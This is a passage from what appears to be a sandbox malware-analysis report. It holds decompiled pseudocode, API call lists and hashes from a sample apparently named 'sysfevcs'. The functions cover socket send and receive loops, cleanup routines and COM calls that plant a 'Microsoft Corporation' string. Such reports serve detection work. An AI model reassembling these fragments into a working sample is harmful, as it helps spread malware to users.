                                                                                                                                                                                                                                                                  			E0040E750(char _a4) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				signed int _t31;
                                                                                                                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                  				long _t43;
                                                                                                                                                                                                                                                                  				char _t51;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                  				long* _t54;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t54 =  &_v12;
                                                                                                                                                                                                                                                                  				_t51 = _a4;
                                                                                                                                                                                                                                                                  				_t52 = 0;
                                                                                                                                                                                                                                                                  				_v4 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  				_t43 = _v12;
                                                                                                                                                                                                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                                                                                                                                  					return _t32;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                                                                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                  						if(_t38 == 0) {
                                                                                                                                                                                                                                                                  							__imp__#111();
                                                                                                                                                                                                                                                                  							_t52 = _t38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                                                                                                                  					E0040E560(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                  					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                  					_t52 = 0;
                                                                                                                                                                                                                                                                  					_v4 = 0;
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                                                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  					_t43 = _v12;
                                                                                                                                                                                                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                  				} while (_t43 != 0);
                                                                                                                                                                                                                                                                  				return _t32;
                                                                                                                                                                                                                                                                  			}















                                                                                                                                                                                                                                                                  0x0040e750
                                                                                                                                                                                                                                                                  0x0040e75c
                                                                                                                                                                                                                                                                  0x0040e773
                                                                                                                                                                                                                                                                  0x0040e777
                                                                                                                                                                                                                                                                  0x0040e77b
                                                                                                                                                                                                                                                                  0x0040e77f
                                                                                                                                                                                                                                                                  0x0040e783
                                                                                                                                                                                                                                                                  0x0040e785
                                                                                                                                                                                                                                                                  0x0040e78b
                                                                                                                                                                                                                                                                  0x0040e790
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e793
                                                                                                                                                                                                                                                                  0x0040e795
                                                                                                                                                                                                                                                                  0x0040e7a7
                                                                                                                                                                                                                                                                  0x0040e7af
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7b9
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7cd
                                                                                                                                                                                                                                                                  0x0040e7ce
                                                                                                                                                                                                                                                                  0x0040e7d3
                                                                                                                                                                                                                                                                  0x0040e7e9
                                                                                                                                                                                                                                                                  0x0040e7ed
                                                                                                                                                                                                                                                                  0x0040e7f1
                                                                                                                                                                                                                                                                  0x0040e7f5
                                                                                                                                                                                                                                                                  0x0040e7f9
                                                                                                                                                                                                                                                                  0x0040e7fb
                                                                                                                                                                                                                                                                  0x0040e801
                                                                                                                                                                                                                                                                  0x0040e804
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E783
                                                                                                                                                                                                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040E7AF
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E7B9
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E7F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                  • Opcode ID: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction ID: 9fa0d190d6e29d18b90f4a83acc4cb02c1da8db6fe46cf76fa1674e9ca939a6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5215E711083119BC200DF56D880D5BB7ECBFC8B54F144A2EF598A3291D734EA09CBAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E488
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,0040E9A4), ref: 0040E490
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001,?,?,0040E9A4), ref: 0040E4A6
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E4CC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                  • Opcode ID: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction ID: f60af05fe9e946153d7423b5ea7d9ed04cc507d8caf150a665a7eef65fd161d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1511AD76108305AFD320DF65EC84AABB7ECEB88700F40493EF945E2140E676E90D97B6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E30C
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E312
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E328
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E34A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                  • Opcode ID: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction ID: 81c4ec745dd4513a9ad0e7e8fad5c67f00d8ce5ff8787c200ce92e4071391af0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B014472244305AAE730DA96DC85F9B77A8DBC4711F044839F604D62C0C7B6A5459B79
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040BAF0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  					E00408990( *_t18);
                                                                                                                                                                                                                                                                  					return E00408990(_a4);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x0040bafa
                                                                                                                                                                                                                                                                  0x0040baff
                                                                                                                                                                                                                                                                  0x0040bb09
                                                                                                                                                                                                                                                                  0x0040bb0f
                                                                                                                                                                                                                                                                  0x0040bb21
                                                                                                                                                                                                                                                                  0x0040bb2e
                                                                                                                                                                                                                                                                  0x0040bb38
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb1e
                                                                                                                                                                                                                                                                  0x0040bb47
                                                                                                                                                                                                                                                                  0x0040bb54
                                                                                                                                                                                                                                                                  0x0040bb5d
                                                                                                                                                                                                                                                                  0x0040bb61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040bb72
                                                                                                                                                                                                                                                                  0x0040bb78

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0040E9A0), ref: 0040BB09
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(0040E9A4), ref: 0040BB38
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0040E9A0), ref: 0040BB47
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0040E9A0), ref: 0040BB54
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                  • Opcode ID: a2ba868ab6035a1893e2453c8998cc0da5243feb3aeb9aad8bf31b4b9c5087ae
                                                                                                                                                                                                                                                                  • Instruction ID: 372fde51beb75ce8a5f14432a71d852ad4f12131a1d584bef4942ad9e05f072d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2ba868ab6035a1893e2453c8998cc0da5243feb3aeb9aad8bf31b4b9c5087ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A21161B4900208EBDB14DF94D984A5DB7B5FF44309F1081B9E906BB345D734EE94DB89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DFA0(void* __esi) {
                                                                                                                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                  				void* _t22;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t22 = __esi;
                                                                                                                                                                                                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                  				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                  				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                  				if(__esi == 0) {
                                                                                                                                                                                                                                                                  					L9:
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                  						if(_t13 != 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_t19 == 0) {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                  						E00408990(_t22);
                                                                                                                                                                                                                                                                  						goto L9;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040dfa0
                                                                                                                                                                                                                                                                  0x0040dfa2
                                                                                                                                                                                                                                                                  0x0040dfa7
                                                                                                                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                                                                                                                  0x0040dfb8
                                                                                                                                                                                                                                                                  0x0040e007
                                                                                                                                                                                                                                                                  0x0040e008
                                                                                                                                                                                                                                                                  0x0040e013
                                                                                                                                                                                                                                                                  0x0040dfba
                                                                                                                                                                                                                                                                  0x0040dfc8
                                                                                                                                                                                                                                                                  0x0040dfd9
                                                                                                                                                                                                                                                                  0x0040dfdc
                                                                                                                                                                                                                                                                  0x0040dfe1
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe3
                                                                                                                                                                                                                                                                  0x0040dfe8
                                                                                                                                                                                                                                                                  0x0040dfef
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dfea
                                                                                                                                                                                                                                                                  0x0040dff9
                                                                                                                                                                                                                                                                  0x0040dfff
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040dfca
                                                                                                                                                                                                                                                                  0x0040dfcd
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                                                                                                                  0x0040dfc8

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E06C,?,?), ref: 0040DFB0
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DFC0
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040DFCD
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E06C,?,?), ref: 0040E008
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1f96ec6c422f688b484f13e4f9c5abbc888f40617d7012874552a3011c652d57
                                                                                                                                                                                                                                                                  • Instruction ID: 10ffaa5ee4f4450ed6c24471392a2b760de4a10e81b3918d49f549c16643c8c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f96ec6c422f688b484f13e4f9c5abbc888f40617d7012874552a3011c652d57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B01F7756423019FC3309F66ED44AAB73A8AF85721B00543EF447E7A41DB34E409CB29
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406251), ref: 004058D8
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00413590), ref: 004058E3
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00405908
                                                                                                                                                                                                                                                                    • Part of subcall function 00405640: SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405902
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 459949847-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction ID: 0d179a223d5d04d98ee6b13ff580c22635ce0ab0454649889296378f6cfd7aab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E09AB8900208EBC724EBA0EE0EB8E7728EB04712F1004B8F50566290DA766E48CB19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                                                                                                                  			E00405640(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				short _v36;
                                                                                                                                                                                                                                                                  				char _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                                                                                                                  				intOrPtr _t110;
                                                                                                                                                                                                                                                                  				void* _t118;
                                                                                                                                                                                                                                                                  				void* _t199;
                                                                                                                                                                                                                                                                  				void* _t200;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t95 = E004055F0(0x410f58, 0x410f68);
                                                                                                                                                                                                                                                                  					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                  					_v28 = _t95;
                                                                                                                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push( &_v32);
                                                                                                                                                                                                                                                                  					_push(_v28);
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                  						_push( &_v16);
                                                                                                                                                                                                                                                                  						_push(_v32);
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                  							_push( &_v36);
                                                                                                                                                                                                                                                                  							_push(_v16);
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                  								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                  									_push( &_v12);
                                                                                                                                                                                                                                                                  									_push(_v16);
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                  										_push( &_v24);
                                                                                                                                                                                                                                                                  										_push(_a4);
                                                                                                                                                                                                                                                                  										_push(_v12);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                  											_t110 = E004055F0(0x410f78, 0x410f88);
                                                                                                                                                                                                                                                                  											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                  											_v24 = _t110;
                                                                                                                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                                                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                  												_v8 = _t110;
                                                                                                                                                                                                                                                                  												if(_v8 != 0) {
                                                                                                                                                                                                                                                                  													_push(_v8);
                                                                                                                                                                                                                                                                  													_push(_v24);
                                                                                                                                                                                                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                  														_push(_a4);
                                                                                                                                                                                                                                                                  														_push(_v24);
                                                                                                                                                                                                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  															if(_t118 == 0) {
                                                                                                                                                                                                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                  																_t118 = 0;
                                                                                                                                                                                                                                                                  																if(0 != 0) {
                                                                                                                                                                                                                                                                  																	continue;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																L34:
                                                                                                                                                                                                                                                                  																if(_v20 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 = E00408990(_v20);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v8 != 0) {
                                                                                                                                                                                                                                                                  																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v24 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v12 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v16 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v32 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v28 == 0) {
                                                                                                                                                                                                                                                                  																	return _t118;
                                                                                                                                                                                                                                                                  																} else {
